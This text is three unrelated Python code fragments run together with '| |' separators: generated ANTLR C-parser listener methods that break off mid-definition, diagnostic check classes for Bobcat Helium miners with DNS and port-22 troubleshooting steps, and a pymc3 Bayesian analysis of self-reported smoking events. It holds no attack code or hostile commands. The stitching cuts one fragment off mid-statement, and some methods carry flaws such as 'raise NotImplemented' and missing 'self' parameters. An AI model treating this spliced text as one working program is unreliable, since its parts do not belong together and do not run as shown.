# Exit a parse tree produced by CParser#gccAttributeList.
def exitGccAttributeList(self, ctx:CParser.GccAttributeListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#gccAttribute.
def enterGccAttribute(self, ctx:CParser.GccAttributeContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#gccAttribute.
def exitGccAttribute(self, ctx:CParser.GccAttributeContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#nestedParenthesesBlock.
def enterNestedParenthesesBlock(self, ctx:CParser.NestedParenthesesBlockContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#nestedParenthesesBlock.
def exitNestedParenthesesBlock(self, ctx:CParser.NestedParenthesesBlockContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#pointer.
def enterPointer(self, ctx:CParser.PointerContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#pointer.
def exitPointer(self, ctx:CParser.PointerContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#typeQualifierList.
def enterTypeQualifierList(self, ctx:CParser.TypeQualifierListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#typeQualifierList.
def exitTypeQualifierList(self, ctx:CParser.TypeQualifierListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#parameterTypeList.
def enterParameterTypeList(self, ctx:CParser.ParameterTypeListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#parameterTypeList.
def exitParameterTypeList(self, ctx:CParser.ParameterTypeListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#parameterList.
def enterParameterList(self, ctx:CParser.ParameterListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#parameterList.
def exitParameterList(self, ctx:CParser.ParameterListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#parameterDeclaration.
def enterParameterDeclaration(self, ctx:CParser.ParameterDeclarationContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#parameterDeclaration.
def exitParameterDeclaration(self, ctx:CParser.ParameterDeclarationContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#identifierList.
def enterIdentifierList(self, ctx:CParser.IdentifierListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#identifierList.
def exitIdentifierList(self, ctx:CParser.IdentifierListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#typeName.
def enterTypeName(self, ctx:CParser.TypeNameContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#typeName.
def exitTypeName(self, ctx:CParser.TypeNameContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#abstractDeclarator.
def enterAbstractDeclarator(self, ctx:CParser.AbstractDeclaratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#abstractDeclarator.
def exitAbstractDeclarator(self, ctx:CParser.AbstractDeclaratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#directAbstractDeclarator.
def enterDirectAbstractDeclarator(self, ctx:CParser.DirectAbstractDeclaratorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#directAbstractDeclarator.
def exitDirectAbstractDeclarator(self, ctx:CParser.DirectAbstractDeclaratorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#typedefName.
def enterTypedefName(self, ctx:CParser.TypedefNameContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#typedefName.
def exitTypedefName(self, ctx:CParser.TypedefNameContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#initializer.
def enterInitializer(self, ctx:CParser.InitializerContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#initializer.
def exitInitializer(self, ctx:CParser.InitializerContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#initializerList.
def enterInitializerList(self, ctx:CParser.InitializerListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#initializerList.
def exitInitializerList(self, ctx:CParser.InitializerListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#designation.
def enterDesignation(self, ctx:CParser.DesignationContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#designation.
def exitDesignation(self, ctx:CParser.DesignationContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#designatorList.
def enterDesignatorList(self, ctx:CParser.DesignatorListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#designatorList.
def exitDesignatorList(self, ctx:CParser.DesignatorListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#designator.
def enterDesignator(self, ctx:CParser.DesignatorContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#designator.
def exitDesignator(self, ctx:CParser.DesignatorContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#staticAssertDeclaration.
def enterStaticAssertDeclaration(self, ctx:CParser.StaticAssertDeclarationContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#staticAssertDeclaration.
def exitStaticAssertDeclaration(self, ctx:CParser.StaticAssertDeclarationContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#statement.
def enterStatement(self, ctx:CParser.StatementContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#statement.
def exitStatement(self, ctx:CParser.StatementContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#labeledStatement.
def enterLabeledStatement(self, ctx:CParser.LabeledStatementContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#labeledStatement.
def exitLabeledStatement(self, ctx:CParser.LabeledStatementContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#compoundStatement.
def enterCompoundStatement(self, ctx:CParser.CompoundStatementContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#compoundStatement.
def exitCompoundStatement(self, ctx:CParser.CompoundStatementContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#blockItemList.
def enterBlockItemList(self, ctx:CParser.BlockItemListContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#blockItemList.
def exitBlockItemList(self, ctx:CParser.BlockItemListContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#blockItem.
def enterBlockItem(self, ctx:CParser.BlockItemContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#blockItem.
def exitBlockItem(self, ctx:CParser.BlockItemContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#expressionStatement.
def enterExpressionStatement(self, ctx:CParser.ExpressionStatementContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#expressionStatement.
def exitExpressionStatement(self, ctx:CParser.ExpressionStatementContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#selectionStatement.
def enterSelectionStatement(self, ctx:CParser.SelectionStatementContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#selectionStatement.
def exitSelectionStatement(self, ctx:CParser.SelectionStatementContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#iterationStatement.
def enterIterationStatement(self, ctx:CParser.IterationStatementContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#iterationStatement.
def exitIterationStatement(self, ctx:CParser.IterationStatementContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#forCondition.
def enterForCondition(self, ctx:CParser.ForConditionContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#forCondition.
def exitForCondition(self, ctx:CParser.ForConditionContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#forDeclaration.
def enterForDeclaration(self, ctx:CParser.ForDeclarationContext):
self.enter_rule(ctx)
# Exit a parse tree produced by CParser#forDeclaration.
def exitForDeclaration(self, ctx:CParser.ForDeclarationContext):
self.exit_rule(ctx)
# Enter a parse tree produced by CParser#forExpression.
def | |
The process can take some time so please be patient and cooperative.",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check():
raise NotImplemented
class TooManyLookupAttemptsErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Too Many Lookup Attempts Error",
root_cause="DNS server settings",
description="This error occurs when your DNS server cannot find the correct nameserver. Normally, the Bobcat miner will automatically add the appropriate nameserver for you.",
autopilot_repair_steps=[],
manual_repair_steps=[
"If this error continues to appear and your miner is not behaving as expected you can try setting your DNS server to 8.8.8.8.",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check():
raise NotImplemented
class OnboardingDewiOrgNxdomainErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Onboarding Dewi Org Nxdomain Error",
root_cause="DNS server settings",
description="This error occurs when your DNS server cannot find the correct nameserver. Normally, the Bobcat will automatically add the appropriate nameserver for you. ",
autopilot_repair_steps=[],
manual_repair_steps=[
"If this error continues to appear and your miner is not behaving as expected you can try setting your DNS server to 8.8.8.8.",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check():
raise NotImplemented
class FailedToStartChildErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Failed To Start Child Error",
root_cause="Faulty ECC chip",
description="This usually means that there is either a ECC chip fault or it's a firmware issue.",
autopilot_repair_steps=[
{"func": bobcat.reset},
{"func": bobcat.fastsync},
],
manual_repair_steps=[
"Reset",
"Fastsync",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check():
raise NotImplemented
class NotADetsFileErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Not A Dets File Error",
root_cause="Broken Blockchain but this shouldn't be an issue anymore with the latest firmware.",
description="There is probably a corruption in the database",
autopilot_repair_steps=["resync", "fastsync"],
manual_repair_steps=[
"Resync",
"Fastsync",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check():
raise NotImplemented
class SnapshotsHeliumWTFErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Snapshots Helium WTF Error",
root_cause="DNS issue",
description="Miner is unable to connect to DNS servers. New Diagnoser should automatically add Google DNS so it should get rid of this issue.",
autopilot_repair_steps=[],
manual_repair_steps=[
"Add 8.8.8.8 to your DNS server",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
"Double check with your ISP to see if there is a strict firewall.",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check():
raise NotImplemented
class SnapshotDownloadOrLoadingFailedErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Snapshot Download or Loading Failed Error",
root_cause="Miner is unable to download the latest snapshot from the blockchain",
description="There may be too many miners trying to download the snapshot at the same time or your internet connection may be too slow.",
autopilot_repair_steps=[],
manual_repair_steps=[
"Check that your miner is connected via ethernet and that your internet connection is stable, otherwise, the situation should eventually sort itself out.",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check():
raise NotImplemented
class NoPlausibleBlocksInBatchErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="No Plausible Blocks In Batch Error",
root_cause="Helium Network Bug error",
description="This is a Helium network bug that affects miners across all manufacturers. Helium is actively trying to solve the issue.",
autopilot_repair_steps=[
{"func": bobcat.reset},
{"func": bobcat.fastsync},
],
manual_repair_steps=[
"Helium recommends that you continue to resync and reset until your miner is able to get past the snapshot. Unfortunately, if that doesn't work then you will have to wait for Helium OTA update to fix the issue."
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check():
raise NotImplemented
class RPCFailedCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="RPC to 'miner@127.0.0.1' failed Error",
root_cause="Docker container or ECC fault",
description="You might see this during a reset, reboot, or OTA. This is related to the status of the ECC chip. If this error goes away then nothing is wrong. If you continue to see the error you can try the following.",
autopilot_repair_steps=[
{"func": bobcat.reboot},
{"func": bobcat.reset},
{"func": bobcat.fastsync},
],
manual_repair_steps=[
"First Try Reboot",
"Then Try Reset",
"Then Fastsync",
"Make Sure Your Miner is Connected to the Internet. What color is the miner's LED?",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413692565659-Common-Error-Logs-in-Miner-5s-"
],
)
def check():
raise NotImplemented
class UnknownErrorCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Unknown Error Status",
root_cause="Miner's Docker Container",
description="This can happen if your miner's Docker crashes. Sometimes losing power or internet connection during an OTA can cause a miner's Docker to crash. This can typically be fixed with a reboot or a reset, followed by a fast sync if your gap is >400. Fast Sync is recommended if your gap is >400 and your miner has been fully synced before.",
autopilot_repair_steps=[
{"func": bobcat.reboot},
{"func": bobcat.reset},
{"func": bobcat.fastsync},
],
manual_repair_steps=[
"First Try Reboot",
"Try Reset",
"Then Fastsync",
"Make Sure Your Miner is Connected to the Internet. What color is your miner's LED?",
],
customer_support_steps=[
"If Possible, Screenshots of Your Diagnoser.",
"Indicate Miner's LED Color",
"Open Port 22, if Unable to Access the Diagnoser",
"Provide Miner's IP Address",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=[
"https://bobcatminer.zendesk.com/hc/en-us/articles/4413666097051-Status-Down-4413666097051-Status-Down-"
],
)
def check(self) -> bool:
is_unhealthy = not self.bobcat.is_healthy
if is_unhealthy:
self.bobcat.logger.error(
f"Bobcat Status: {self.bobcat.status.capitalize()}",
extra={"description": str(self)} if self.verbose else {},
)
return is_unhealthy
class OnlineStatusCheck(BobcatCheck):
def __init__(self, bobcat: Bobcat, verbose: str):
super().__init__(
bobcat=bobcat,
verbose=verbose,
name="Online Status",
root_cause="The Helium Network sees your Bobcat as Offline.",
description="This shows the hotspot information that is currently available in the Helium blockchain. Note that this might differ from the actual status of your hotpsot as it takes time for information to propagate from your hotspot to the blockchain.",
autopilot_repair_steps=[],
manual_repair_steps=[
"Check the Diagnoser to see if the Bobcat is running and is healthy.",
"Give the Helium Network more time to propagate from your hotspot to the blockchain. Wait 24 hours and check again.",
],
customer_support_steps=[
"If possible, send screenshots of your Diagnoser.",
"Tell us what color your LED is.",
"If you can't access your Diagnoser, please open port 22",
"Provide the miner's public IP address.",
"Confirm Port 22 is Open (Include a Screenshot of this Page)",
],
troubleshooting_guides=["https://www.nowitness.org/troubleshooting/"],
| |
<reponame>wdempsey/sense2stop-lvm
#%%
import pymc3 as pm
import arviz as az
import pandas as pd
import numpy as np
from datetime import datetime
from scipy import stats
import os
import pickle
import theano.tensor as tt
from scipy import special
# List down file paths
#dir_data = "../smoking-lvm-cleaned-data/final"
dir_data = os.environ['dir_data']
dir_picklejar = os.environ['dir_picklejar']
# Read in data
data_dates = pd.read_csv(os.path.join(os.path.realpath(dir_data), 'participant-dates.csv'))
data_selfreport = pd.read_csv(os.path.join(os.path.realpath(dir_data), 'self-report-smoking-final.csv'))
#%%
###############################################################################
# Data preparation: data_dates data frame
###############################################################################
# Create unix timestamps corresponding to 12AM of a given human-readable date
data_dates["start_date_unixts"] = (
data_dates["start_date"]
.apply(lambda x: datetime.strptime(x, "%m/%d/%Y"))
.apply(lambda x: datetime.timestamp(x))
)
data_dates["quit_date_unixts"] = (
data_dates["quit_date"]
.apply(lambda x: datetime.strptime(x, "%m/%d/%Y"))
.apply(lambda x: datetime.timestamp(x))
)
data_dates["expected_end_date_unixts"] = (
data_dates["expected_end_date"]
.apply(lambda x: datetime.strptime(x, "%m/%d/%Y"))
.apply(lambda x: datetime.timestamp(x))
)
data_dates["actual_end_date_unixts"] = (
data_dates["actual_end_date"]
.apply(lambda x: datetime.strptime(x, "%m/%d/%Y"))
.apply(lambda x: datetime.timestamp(x))
)
# More tidying up
data_dates = (
data_dates
.rename(columns={"participant": "participant_id",
"quit_date": "quit_date_hrts",
"start_date": "start_date_hrts",
"actual_end_date": "actual_end_date_hrts",
"expected_end_date": "expected_end_date_hrts"})
.loc[:, ["participant_id",
"start_date_hrts","quit_date_hrts",
"expected_end_date_hrts", "actual_end_date_hrts",
"start_date_unixts", "quit_date_unixts",
"expected_end_date_unixts","actual_end_date_unixts"]]
)
#%%
###############################################################################
# Merge data_selfreport with data_dates
###############################################################################
data_selfreport = data_dates.merge(data_selfreport,
how = 'left',
on = 'participant_id')
#%%
###############################################################################
# Data preparation: data_selfreport data frame
###############################################################################
# Drop the participants labelled 10X as they are pilot individuals
data_selfreport = data_selfreport.dropna(how = 'any', subset=['hour'])
def calculate_delta(message):
sr_accptresponse = ['Smoking Event(less than 5 minutes ago)',
'Smoking Event(5 - 15 minutes ago)',
'Smoking Event(15 - 30 minutes ago)',
'Smoking Event(more than 30 minutes ago)']
sr_dictionary = {'Smoking Event(less than 5 minutes ago)': 1,
'Smoking Event(5 - 15 minutes ago)': 2,
'Smoking Event(15 - 30 minutes ago)': 3,
'Smoking Event(more than 30 minutes ago)': 4}
if message in sr_accptresponse:
# Convert time from minutes to seconds
use_delta = sr_dictionary[message]
else:
# If participant reported smoking more than 30 minutes ago,
# then we consider time s/he smoked as missing
use_delta = pd.NA
return use_delta
def round_day(raw_day):
if pd.isna(raw_day):
# Missing values for raw_day can occur
# if participant reported smoking more than 30 minutes ago
out_day = pd.NA
else:
# This takes care of the instances when participant reported to smoke
# less than 30 minutes ago
if raw_day >= 0:
# If on or after Quit Date, round down to the nearest integer
# e.g., floor(2.7)=2
out_day = np.floor(raw_day)
else:
# If before Quit Date, round up to the nearest integer
# e.g., ceil(-2.7)=-2
out_day = np.ceil(raw_day)
return out_day
#%%
data_selfreport['date'] = pd.to_datetime(data_selfreport.date)
data_selfreport['start_date'] = pd.to_datetime(data_selfreport.start_date_hrts)
data_selfreport['quit_date'] = pd.to_datetime(data_selfreport.quit_date_hrts)
data_selfreport["delta"] = data_selfreport["message"].apply(lambda x: calculate_delta(x))
# Create a new variable, study_day: number of days since participant entered
# the study
data_selfreport['study_day'] = (data_selfreport['date'] - data_selfreport['start_date']).dt.days
# Create a new variable, day_since_quit: number of days before or after
# 12AM on Quit Date
data_selfreport['day_since_quit'] = (data_selfreport['date'] - data_selfreport['quit_date']).dt.days
# Create a new variable, is_post_quit: whether a given day falls before or on/after 12AM on Quit Date
data_selfreport["is_post_quit"] = data_selfreport["day_since_quit"].apply(lambda x: 0 if x < 0 else 1)
# Create a new variable, day_within_period:
# if is_post_quit<0, number of days after 12AM on start of study
# if is_post_quit>=0, number of days after 12AM on Quit Date
# hence day_within_period is a count variable with ZERO as minimum value
data_selfreport["day_within_period"] = np.where(data_selfreport["is_post_quit"]==0,
data_selfreport["study_day"],
data_selfreport["day_since_quit"])
# Number of hours elapsed since the beginning of the study
data_selfreport['hours_since_start'] = (data_selfreport['date'] - data_selfreport['start_date'])/np.timedelta64(1,'h')
#%%
# Get number of hours elapsed between two self-reported smoking events
data_selfreport['actual_end_date_hrts'] = pd.to_datetime(data_selfreport['actual_end_date_hrts'])
data_selfreport['time_to_quit'] = (data_selfreport.actual_end_date_hrts - data_selfreport.date) / np.timedelta64(1,'m') + 720 # Add 720 minutes to deal with quit date you can provide data still.
data_selfreport = data_selfreport.sort_values(['participant_id','date'])
data_selfreport['time_to_next_event'] = data_selfreport.groupby("participant_id").date.diff().shift(-1)/np.timedelta64(1,'m')
#%%
# For NaN, time_to_next_event is the time until actual quit date.
# These should be treated as censored times
data_selfreport["censored"] = data_selfreport["time_to_next_event"].isnull()
for index in np.where(data_selfreport.censored==True):
temp = data_selfreport['time_to_quit'].iloc[index]
data_selfreport['time_to_next_event'].iloc[index] = temp
#%%
# Finally, select subset of columns
use_these_columns = ["participant_id",
"start_date_hrts", "quit_date_hrts",
"expected_end_date_hrts","actual_end_date_hrts",
"is_post_quit", "study_day", "day_since_quit", "day_within_period",
"message", "delta", "time_to_next_event","censored"]
data_selfreport = data_selfreport.loc[:, use_these_columns]
#%%
###############################################################################
# Data preparation: Create data to be used as input to pymc3
###############################################################################
# Collect data to be used in analyses in a dictionary
collect_data_analysis = {}
collect_data_analysis['df_datapoints'] = (
data_selfreport
.loc[:,["participant_id", "is_post_quit", "time_to_next_event","censored",
"day_within_period", "delta"]]
)
#%%
# collect_results is a dictionary that will collect results across all models
collect_results={}
#%%
###############################################################################
# Estimation using pymc3
###############################################################################
use_this_data = collect_data_analysis['df_datapoints']
def exponential_log_complementary_cdf(x, lam):
''' log complementary CDF of exponential distribution '''
return -lam*x
def exponential_log_pdf(x, lam):
''' log complementary CDF of exponential distribution '''
return np.log(lam)-lam*x
def convert_windowtag(windowtag):
if windowtag == 1:
window_max = 5; window_min = 0
elif windowtag == 2:
window_max = 15; window_min = 5
elif windowtag == 3:
window_max = 30; window_min = 15
else:
window_max = 60; window_min = 30
return window_min, window_max
def normal_cdf(x, mu=0, sd=1):
'''Use theano to compute cdf'''
z = (x-mu)/sd
return (tt.erf(z/np.sqrt(2))+1)/2
def selfreport_mem(x, t, winmin, winmax):
''' Measurement model for self-report '''
gap = t - x
mem_scale = 10
upper = normal_cdf(winmax, mu = gap, sd = mem_scale)
lower = normal_cdf(winmin, mu = gap, sd = mem_scale)
return tt.log(upper-lower)
censored = use_this_data['censored'].values.astype(bool)
time_to_next_event = use_this_data['time_to_next_event'].values.astype(float)
day_within_period = use_this_data['day_within_period'].values.astype(float)
is_post_quit = use_this_data['is_post_quit'].values.astype(float)
windowtag = use_this_data['delta'].values.astype(float)
temp = np.array(list(map(convert_windowtag,windowtag)))
windowmin = temp[:,0]
windowmax = temp[:,1]
midpoint = (windowmin+windowmax)/2
test_obs = time_to_next_event-midpoint
test_obs[test_obs <= 0] = 1.
negativetimes = time_to_next_event <= 1
remove_obs = censored | negativetimes
num_ok = time_to_next_event[~remove_obs].size
test_obs1 = test_obs[~remove_obs]
time_to_next_event1 = time_to_next_event[~remove_obs]
windowmin1=windowmin[~remove_obs]
windowmax1=windowmax[~remove_obs]
day_within_period1=day_within_period[~remove_obs]
is_post_quit1 = is_post_quit[~remove_obs]
#%%
with pm.Model() as model:
# -------------------------------------------------------------------------
# Priors
# -------------------------------------------------------------------------
beta = pm.Normal('beta', mu=0, sd=10)
beta_day = pm.Normal('beta_day', mu=0, sd=10)
# -------------------------------------------------------------------------
# Likelihood
# -------------------------------------------------------------------------
loglamb_observed = beta + beta_day*day_within_period1
lamb_observed = np.exp(loglamb_observed)
# Y_hat_observed = pm.Exponential('Y_hat_observed', lam = lamb_observed, observed = time_to_next_event[~censored])
Y_latent = pm.Exponential('Y_latent', lam = lamb_observed, shape=len(test_obs1), testval=test_obs1)
Y_observed = pm.Potential('Y_observed', selfreport_mem(Y_latent, time_to_next_event1, windowmin1, windowmax1))
loglamb_censored = beta + beta_day*day_within_period[censored] # Switched model to 1 parameter for both censored/uncensored (makes sense if final obs is "real")
lamb_censored = np.exp(loglamb_censored)
Y_hat_censored = pm.Potential('Y_hat_censored', exponential_log_complementary_cdf(x = time_to_next_event[censored], lam = lamb_censored))
#%%
# Sample from posterior distribution
with model:
# posterior_samples = pm.sample(draws=3000, tune=2000, cores=1, target_accept=0.80)
posterior_samples = pm.sample(draws = 3000, tune=2000, init='adapt_diag', cores = 1)
#%%
# Calculate 95% credible interval
model_summary_logscale = az.summary(posterior_samples, credible_interval=.95)
model_summary_logscale = model_summary_logscale[['mean','hpd_2.5%','hpd_97.5%']]
# Produce trace plots
pm.traceplot(posterior_samples, var_names = ['beta', 'beta_day', 'Y_latent'])
# Collect results
collect_results['0'] = {'model':model,
'posterior_samples':posterior_samples,
'model_summary_logscale':model_summary_logscale}
#%%
# Remove variable from workspace
del model, posterior_samples, model_summary_logscale
#%%
###############################################################################
# Estimation using pymc3; pre-/post- quit split.
###############################################################################
with pm.Model() as model:
# -------------------------------------------------------------------------
# Priors
# -------------------------------------------------------------------------
beta_prequit = pm.Normal('beta_prequit', mu=0, sd=10)
beta_postquit = pm.Normal('beta_postquit', mu=0, sd=10)
beta_prequit_day = pm.Normal('beta_prequit_day', mu=0, sd=10)
beta_postquit_day = pm.Normal('beta_postquit_day', mu=0, sd=10)
# alpha = pm.Normal('alpha', mu=0, sd=10)
# -------------------------------------------------------------------------
# Likelihood
# -------------------------------------------------------------------------
loglamb_observed = beta_prequit*(1-is_post_quit1) + beta_prequit_day*day_within_period1*(1-is_post_quit1) + beta_postquit*is_post_quit1 + beta_postquit_day*day_within_period1*is_post_quit1
lamb_observed = np.exp(loglamb_observed)
Y_hat_observed = pm.Exponential('Y_hat_observed', lam = lamb_observed, observed=time_to_next_event1)
loglamb_censored = beta_prequit*(1-is_post_quit[censored]) + beta_prequit_day*day_within_period[censored]*(1-is_post_quit[censored]) + beta_postquit*is_post_quit[censored] + beta_postquit_day*day_within_period[censored]*is_post_quit[censored] # Model if no dropout
# loglamb_censored = alpha # Model if final window is drop-out
lamb_censored = np.exp(loglamb_censored)
Y_hat_censored = pm.Potential('Y_hat_censored', exponential_log_complementary_cdf(x = time_to_next_event[censored], lam = lamb_censored))
#%%
# Sample from posterior distribution
with model:
# posterior_samples = pm.sample(draws=3000, tune=2000, cores=1, target_accept=0.80)
posterior_samples = pm.sample(draws = 3000, tune=2000, init='adapt_diag', cores = 1)
#%%
# Calculate 95% credible interval
model_summary_logscale = az.summary(posterior_samples, credible_interval=.95)
model_summary_logscale = model_summary_logscale[['mean','hpd_2.5%','hpd_97.5%']]
# Produce trace plots
pm.traceplot(posterior_samples, var_names = ['beta_prequit', 'beta_prequit_day' , 'beta_postquit', 'beta_postquit_day'])
# Collect results
collect_results['1'] = {'model':model,
'posterior_samples':posterior_samples,
'model_summary_logscale':model_summary_logscale}
#%%
# Remove variable from workspace
del model, posterior_samples, model_summary_logscale
#%%
###############################################################################
# Estimation using pymc3
###############################################################################
# Create new participant id's
participant_names = use_this_data['participant_id'].unique()
n_participants = len(participant_names)
d = {'participant_id':participant_names, 'participant_idx':np.array(range(0,n_participants))}
reference_df = pd.DataFrame(d)
use_this_data = use_this_data.merge(reference_df, how = 'left', on = 'participant_id')
participant_idx = use_this_data['participant_idx'].values
#%%
with pm.Model() as model:
# -------------------------------------------------------------------------
# Priors
# -------------------------------------------------------------------------
beta_prequit = pm.Normal('beta_prequit', mu=0, sd=10)
beta_postquit = pm.Normal('beta_postquit', mu=0, sd=10)
beta_prequit_day = pm.Normal('beta_prequit_day', mu=0, sd=10)
beta_postquit_day = pm.Normal('beta_postquit_day', mu=0, sd=10)
gamma_prequit = pm.Normal('gamma_prequit', mu=0, sd=10, shape=n_participants)
gamma_postquit = pm.Normal('gamma_postquit', mu=0, sd=10, shape=n_participants)
# alpha = pm.Normal('alpha', mu=0, sd=10)
# -------------------------------------------------------------------------
# Likelihood
# -------------------------------------------------------------------------
loglamb_observed = (beta_prequit + gamma_prequit[participant_idx][~remove_obs])*(1-is_post_quit1) + beta_prequit_day*day_within_period1*(1-is_post_quit1) + (beta_postquit + gamma_postquit[participant_idx][~remove_obs])*is_post_quit1 + beta_postquit_day*day_within_period1*is_post_quit1
lamb_observed = np.exp(loglamb_observed)
Y_hat_observed = pm.Exponential('Y_hat_observed', lam = lamb_observed, observed=time_to_next_event1)
# loglamb_censored = alpha
